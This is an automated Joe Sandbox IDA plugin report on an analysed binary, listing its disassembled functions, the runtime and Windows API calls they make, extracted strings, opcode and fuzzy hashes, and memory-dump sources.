Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: InfoLocale$ErrorLastValue_invalid_parameter_noinfo
String ID:
API String ID: 1791019856-0
Opcode ID: e9621d82364b3e643cccb06ae7a219c4f5eb04d529526534056fbe493e2e8778
Instruction ID: 2074669730df2f1152ef9a2bf639d9b6c589e909fd2da2a6bcd1544ffd789d39
Opcode Fuzzy Hash: e9621d82364b3e643cccb06ae7a219c4f5eb04d529526534056fbe493e2e8778
Instruction Fuzzy Hash: 1561A132A0868287EB30BF11D5812B9B3A1FF44750F848139CBAE836D5DFBCE5518B90

Function 00007FF7F131FF30 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F131FF6D

Part of subcall function 00007FF7F131ACC0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F131ACE5

Part of subcall function 00007FF7F1329988: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F13299B0

Part of subcall function 00007FF7F131B6E0: RtlFreeHeap.NTDLL(?,?,?,00007FF7F1324076,?,?,?,00007FF7F13243F3,?,?,00000000,00007FF7F1324A8D,?,?,?,00007FF7F13249BF), ref: 00007FF7F131B6F6
Part of subcall function 00007FF7F131B6E0: GetLastError.KERNEL32(?,?,?,00007FF7F1324076,?,?,?,00007FF7F13243F3,?,?,00000000,00007FF7F1324A8D,?,?,?,00007FF7F13249BF), ref: 00007FF7F131B700

Part of subcall function 00007FF7F1320180: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F13201BE

Strings

.com, xrefs: 00007FF7F13200FB

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: _invalid_parameter_noinfo$ErrorFreeHeapLast
String ID: .com
API String ID: 3231943733-4200470757
Opcode ID: 1fc83e35b853aa723a29c1be1801cb44bc7414c3d3ec3549f2b183986f106b57
Instruction ID: 9597b9117eab405f0f8a97722a2e2a37dfc4f43322ec02dd81f8e3ca92204e16
Opcode Fuzzy Hash: 1fc83e35b853aa723a29c1be1801cb44bc7414c3d3ec3549f2b183986f106b57
Instruction Fuzzy Hash: 0D51B115F0928247FB58BA2298111BAD6819F44BE4FC9463DDE3D477C6EFBDE40842E0

Function 00007FF7F131C348 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,?,?,?,?,00007FF7F1314E06), ref: 00007FF7F131C3BC

Strings

GetLocaleInfoEx, xrefs: 00007FF7F131C364, 00007FF7F131C375

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: ae89882cadfabe5370a4b142e352b083926c22427122065ebf1ff8dc6b4f3545
Instruction ID: 0485d4ce5c585fbe2f6ca7bbae4296ac8f09bf48eff07a1b30b0181f85ff70a4
Opcode Fuzzy Hash: ae89882cadfabe5370a4b142e352b083926c22427122065ebf1ff8dc6b4f3545
Instruction Fuzzy Hash: 82017121F0864286E740AB56B4000AAE6A0AF84BD0F944039DE5D13799CFBCE5418390

Function 00007FF7F12E2B10 Relevance: 3.0, APIs: 2, Instructions: 36networkCOMMON

Download Yara Rule

APIs

htons.WS2_32 ref: 00007FF7F12E2B49
GetCurrentProcessId.KERNEL32(?,?,?,00007FF7F12E1DC1), ref: 00007FF7F12E2B7A

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: CurrentProcesshtons
String ID:
API String ID: 2530476045-0
Opcode ID: 868bba0e5ea3588baa2e0886c201d3e6b5ef66e05ce2cbe54c1e9cd490a4f605
Instruction ID: 9bd5589faef79e598c08e3f2fec325a0a78b95dfcb804cf80165debea363f00f
Opcode Fuzzy Hash: 868bba0e5ea3588baa2e0886c201d3e6b5ef66e05ce2cbe54c1e9cd490a4f605
Instruction Fuzzy Hash: FD017C229247D0CAD304CF35E5001AD77B0FB68B48B44961AFB9987A58EB78D6E0C744

Function 00007FF7F131A610 Relevance: 2.9, Strings: 2, Instructions: 358COMMONLIBRARYCODE

Download Yara Rule

Strings

a/p, xrefs: 00007FF7F131A92A
am/pm, xrefs: 00007FF7F131A8BF

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID:
String ID: a/p$am/pm
API String ID: 0-3206640213
Opcode ID: 52c76232a29cac05a79f6a47eb8daabe339cc537beb659380971972588e0868f
Instruction ID: 40b955ed3e7cb5b3f2d7e3e61021330cd71d26397b142883effb0e5c63f81d03
Opcode Fuzzy Hash: 52c76232a29cac05a79f6a47eb8daabe339cc537beb659380971972588e0868f
Instruction Fuzzy Hash: 04E1E722E4828287F764AF1482545B9B7A1FF107A5F96413BDA2E236C4DF7CE941C3A0

Function 00007FF7F13299F4 Relevance: 2.8, Strings: 2, Instructions: 299COMMON

Download Yara Rule

Strings

emRo, xrefs: 00007FF7F1329A40
Syst, xrefs: 00007FF7F1329A37

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: Heap$AllocErrorFreeLast_invalid_parameter_noinfo
String ID: Syst$emRo
API String ID: 3361962657-2127360862
Opcode ID: b9ffde858468807ccfccbf4fea28965396f61f0720bedf05a98161954030fc29
Instruction ID: 3b2d3d3fb04ad2566ab6d7bdb2bf7352ea13be8c47640124efbb3d56de138e52
Opcode Fuzzy Hash: b9ffde858468807ccfccbf4fea28965396f61f0720bedf05a98161954030fc29
Instruction Fuzzy Hash: ECB1E522F086A647FB10FB2194211BDA7A0AF55BA4F844579DE6E077C9DFBCE441C3A0

Function 00007FF7F1309498 Relevance: 2.6, Strings: 2, Instructions: 92COMMON

Download Yara Rule

Strings

COMSPEC, xrefs: 00007FF7F13094BB
cmd.exe, xrefs: 00007FF7F1309585

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID: COMSPEC$cmd.exe
API String ID: 485612231-2256226045
Opcode ID: 07435ee56794d87a751827999ce88dd16743ba0e3ce7b8fcb190b0e72378318c
Instruction ID: 8f14c6ffcf9ce2f87afc31369d004f784addf93190616831f0eeb002ae453d7d
Opcode Fuzzy Hash: 07435ee56794d87a751827999ce88dd16743ba0e3ce7b8fcb190b0e72378318c
Instruction Fuzzy Hash: 17318336F0874686F714FBB694514ADA3E4AF88758F880539DE2D576DACF79D00083A0

Function 00007FF7F131860C Relevance: 1.9, APIs: 1, Instructions: 373COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32 ref: 00007FF7F1318754

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-0
Opcode ID: 78c9213601d1c03f31e01f22b06d0bb6a4a3aef194d8807f1021b249d99e1a07
Instruction ID: 7c082e22ac49cce62a0bae40aa1e5db865b90f46de89e5c50cc60a24f5b3014f
Opcode Fuzzy Hash: 78c9213601d1c03f31e01f22b06d0bb6a4a3aef194d8807f1021b249d99e1a07
Instruction Fuzzy Hash: E312DE22E08BC586E751DF3994052FDB3A4FF58758F469239EBAC92292DF78E190C350

Function 00007FF7F13237E8 Relevance: 1.8, APIs: 1, Instructions: 337COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb38fcbf89dbfde70ccf7e220177ef70d40903f3dda1410dc1f57cf82e95ef2e
Instruction ID: 7a802cb311cabb7c1037b17d2e108be88f7a19701d8ac0ce65c7174cb065702b
Opcode Fuzzy Hash: bb38fcbf89dbfde70ccf7e220177ef70d40903f3dda1410dc1f57cf82e95ef2e
Instruction Fuzzy Hash: 70E1B172A04B9586E720EB61E4412EEA7A0FF58788F804535DF9E53B86EFBCD245C350

Function 00007FF7F12C6AE0 Relevance: 1.7, Strings: 1, Instructions: 485COMMON

Download Yara Rule

Strings

GMT, xrefs: 00007FF7F12C6CB6

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID:
String ID: GMT
API String ID: 0-2739267314
Opcode ID: 71079b01f291ca49bc93343a6eaff6e67d94e7b06b7d08ec1a74bc346daa3a45
Instruction ID: c56f383d10b3de6728ddf8949b768355aa67ba4eac70159b4419d21b98b6af48
Opcode Fuzzy Hash: 71079b01f291ca49bc93343a6eaff6e67d94e7b06b7d08ec1a74bc346daa3a45
Instruction Fuzzy Hash: AA022272F0858646EB26AA5894403B8F791FB457B4FC44235DB7E837C1EBBCA941CB90

Function 00007FF7F128D31C Relevance: 1.6, Strings: 1, Instructions: 349COMMON

Download Yara Rule

Strings

M&S works hard to make better products and shops. They want to sell even more in the next years., xrefs: 00007FF7F128D32B

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID:
String ID: M&S works hard to make better products and shops. They want to sell even more in the next years.
API String ID: 0-2797344925
Opcode ID: 158b8cbcebd98df24b440e78477ae21f9172c837e58ddc6f753fe1cb96dc9b3d
Instruction ID: 5efbde054b8f6ff51cf54c12c5d031f851d87f18c7069a28b4ccbde57400103e
Opcode Fuzzy Hash: 158b8cbcebd98df24b440e78477ae21f9172c837e58ddc6f753fe1cb96dc9b3d
Instruction Fuzzy Hash: A5B13673B0458947EB15DB69D444569B3A1B794BE4F848132CA6EC7B84DF7CE80DC780

Function 00007FF7F1325AF0 Relevance: 1.6, APIs: 1, Instructions: 70COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F131B1CC: GetLastError.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B1DB
Part of subcall function 00007FF7F131B1CC: FlsGetValue.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B1F0
Part of subcall function 00007FF7F131B1CC: SetLastError.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B27B

Part of subcall function 00007FF7F131B1CC: FlsSetValue.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B211

GetLocaleInfoW.KERNEL32 ref: 00007FF7F1325B58

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ErrorLastValue$InfoLocale
String ID:
API String ID: 673564084-0
Opcode ID: 3e193f239dcf7a728e25989ea658240e7519612e54f0cf54824455059ecb164b
Instruction ID: 86274df5108468ae529891f1ead506e2e935c6ee2e8583a6a001d7778ecc5144
Opcode Fuzzy Hash: 3e193f239dcf7a728e25989ea658240e7519612e54f0cf54824455059ecb164b
Instruction Fuzzy Hash: 03317531A0868287EB24AF21D4413E9B3A0FF48781F849179DA6D836D9DFBCE5418B90

Function 00007FF7F1325740 Relevance: 1.6, APIs: 1, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FF7F131B1CC: GetLastError.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B1DB
Part of subcall function 00007FF7F131B1CC: FlsGetValue.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B1F0
Part of subcall function 00007FF7F131B1CC: SetLastError.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B27B

EnumSystemLocalesW.KERNEL32(?,?,?,00007FF7F1325F2F,?,00000000,00000092,?,?,00000000,?,00007FF7F1314C2D), ref: 00007FF7F13257DE

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystemValue
String ID:
API String ID: 3029459697-0
Opcode ID: 2f92ca270646feb76560f124390181fc265c3ea606fbccee4c2dd3051953e7c7
Instruction ID: 2383c8c96943b137bea5f972acf6f59d88202b8dfe2f9678f91e79c61db770ff
Opcode Fuzzy Hash: 2f92ca270646feb76560f124390181fc265c3ea606fbccee4c2dd3051953e7c7
Instruction Fuzzy Hash: A511D267E18685CAEB14AF19D0406A8BBA0EF90FA0F844139D629433C4CFB8D6D1CB90

Function 00007FF7F1325CF8 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F131B1CC: GetLastError.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B1DB
Part of subcall function 00007FF7F131B1CC: FlsGetValue.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B1F0
Part of subcall function 00007FF7F131B1CC: SetLastError.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B27B

GetLocaleInfoW.KERNEL32(?,?,?,00007FF7F1325AA2), ref: 00007FF7F1325D2F

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ErrorLast$InfoLocaleValue
String ID:
API String ID: 3796814847-0
Opcode ID: e615fd6ae1c2058287dc77e0c0a833ba8459180b1a1f03f84716c65aaa9cb3e0
Instruction ID: fa15b9e3423ea3e7bcb3d32989bde516c6dcc89f794e0d26efbe81ff966728f0
Opcode Fuzzy Hash: e615fd6ae1c2058287dc77e0c0a833ba8459180b1a1f03f84716c65aaa9cb3e0
Instruction Fuzzy Hash: 3E115031F1859243E774BF25A0447BDA251EF40760F944635D63D476C4DF69E9838B90

Function 00007FF7F1325810 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FF7F131B1CC: GetLastError.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B1DB
Part of subcall function 00007FF7F131B1CC: FlsGetValue.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B1F0
Part of subcall function 00007FF7F131B1CC: SetLastError.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B27B

EnumSystemLocalesW.KERNEL32(?,?,?,00007FF7F1325EEB,?,00000000,00000092,?,?,00000000,?,00007FF7F1314C2D), ref: 00007FF7F132588E

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystemValue
String ID:
API String ID: 3029459697-0
Opcode ID: ab3c08872e52599da4b5c63f81aa011cbda0d1163b7346b2cff8d05489795113
Instruction ID: 28885dc66df02e37537f1571dd2e3abf13345326fe608a6b56fb51132310578d
Opcode Fuzzy Hash: ab3c08872e52599da4b5c63f81aa011cbda0d1163b7346b2cff8d05489795113
Instruction Fuzzy Hash: F501B572F082C287EB147F15E4407F9BAA1EF507A4F858279D679472C4DFF895818B90

Function 00007FF7F131BDB0 Relevance: 1.5, APIs: 1, Instructions: 32COMMONLIBRARYCODE

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(?,?,00000000,00007FF7F131C257,?,?,?,?,?,?,?,?,00000000,00007FF7F1324D90), ref: 00007FF7F131BDFF

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: f51f14732704f7ee42003b3f08c2e67ee626df141659fb0fca109b836753bdf5
Instruction ID: 6f10ca124b7282dc0495617b2165221db7428ce35cfcc446bfa8a4513a207fc3
Opcode Fuzzy Hash: f51f14732704f7ee42003b3f08c2e67ee626df141659fb0fca109b836753bdf5
Instruction Fuzzy Hash: 2EF08172B08B4583E704EB19F8905A5B3B5EF987D0F954039DA6D833A4CFBCD4508394

Function 00007FF7F130AA9C Relevance: 1.5, APIs: 1, Instructions: 28timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF7F130AAB0

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: Time$FileSystem
String ID:
API String ID: 2086374402-0
Opcode ID: ca957c3dfe7c2af0ac6f8859d1bcb381be185acf46c5f6cefe6904997612c2f9
Instruction ID: 7a408c90d7286258556ae2c8fd06a506d9613adeda658d06f305154853d27259
Opcode Fuzzy Hash: ca957c3dfe7c2af0ac6f8859d1bcb381be185acf46c5f6cefe6904997612c2f9
Instruction Fuzzy Hash: A5F0E2E2B29A8803EF149755A8107A4A2829F5CBF4F00A335ED3D0E7C9EF6CE0908300

Function 00007FF7F131E688 Relevance: 1.5, Strings: 1, Instructions: 254COMMONLIBRARYCODE

Download Yara Rule

Strings

gfffffff, xrefs: 00007FF7F131E9CA

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID:
String ID: gfffffff
API String ID: 0-1523873471
Opcode ID: 2561b6827e990c1bdb6b86e7d1e0ce5da4f472f508b9e76e665e23e6ce3723f0
Instruction ID: 797ae2091b25af2493bd2230f7d1376b0409ca8e7744da4ecc39fae75e89cea7
Opcode Fuzzy Hash: 2561b6827e990c1bdb6b86e7d1e0ce5da4f472f508b9e76e665e23e6ce3723f0
Instruction Fuzzy Hash: D3A16563F083C687EB22DB29A0007A9BB91AF50BA4F468135DEAD577C1DB7EE401D351

Function 00007FF7F1307D08 Relevance: 1.5, Strings: 1, Instructions: 247COMMONLIBRARYCODE

Download Yara Rule

Strings

, xrefs: 00007FF7F1307EE4

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 16e2ae31430d18b4ecfef4cf0df7a4c2f446580120bf3df176b47e9a7494e7c2
Instruction ID: 8b2d538c9694801bf0c34ead796045fb9ac21a769b1874aefd22c5bf0b02c905
Opcode Fuzzy Hash: 16e2ae31430d18b4ecfef4cf0df7a4c2f446580120bf3df176b47e9a7494e7c2
Instruction Fuzzy Hash: 7DB18D7290864686E764EF29C05027CBBE1EB49B4CFA4013DCA9E473D5CFB9E845C7A4

Function 00007FF7F130808C Relevance: 1.5, Strings: 1, Instructions: 241COMMON

Download Yara Rule

Strings

, xrefs: 00007FF7F130826E

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

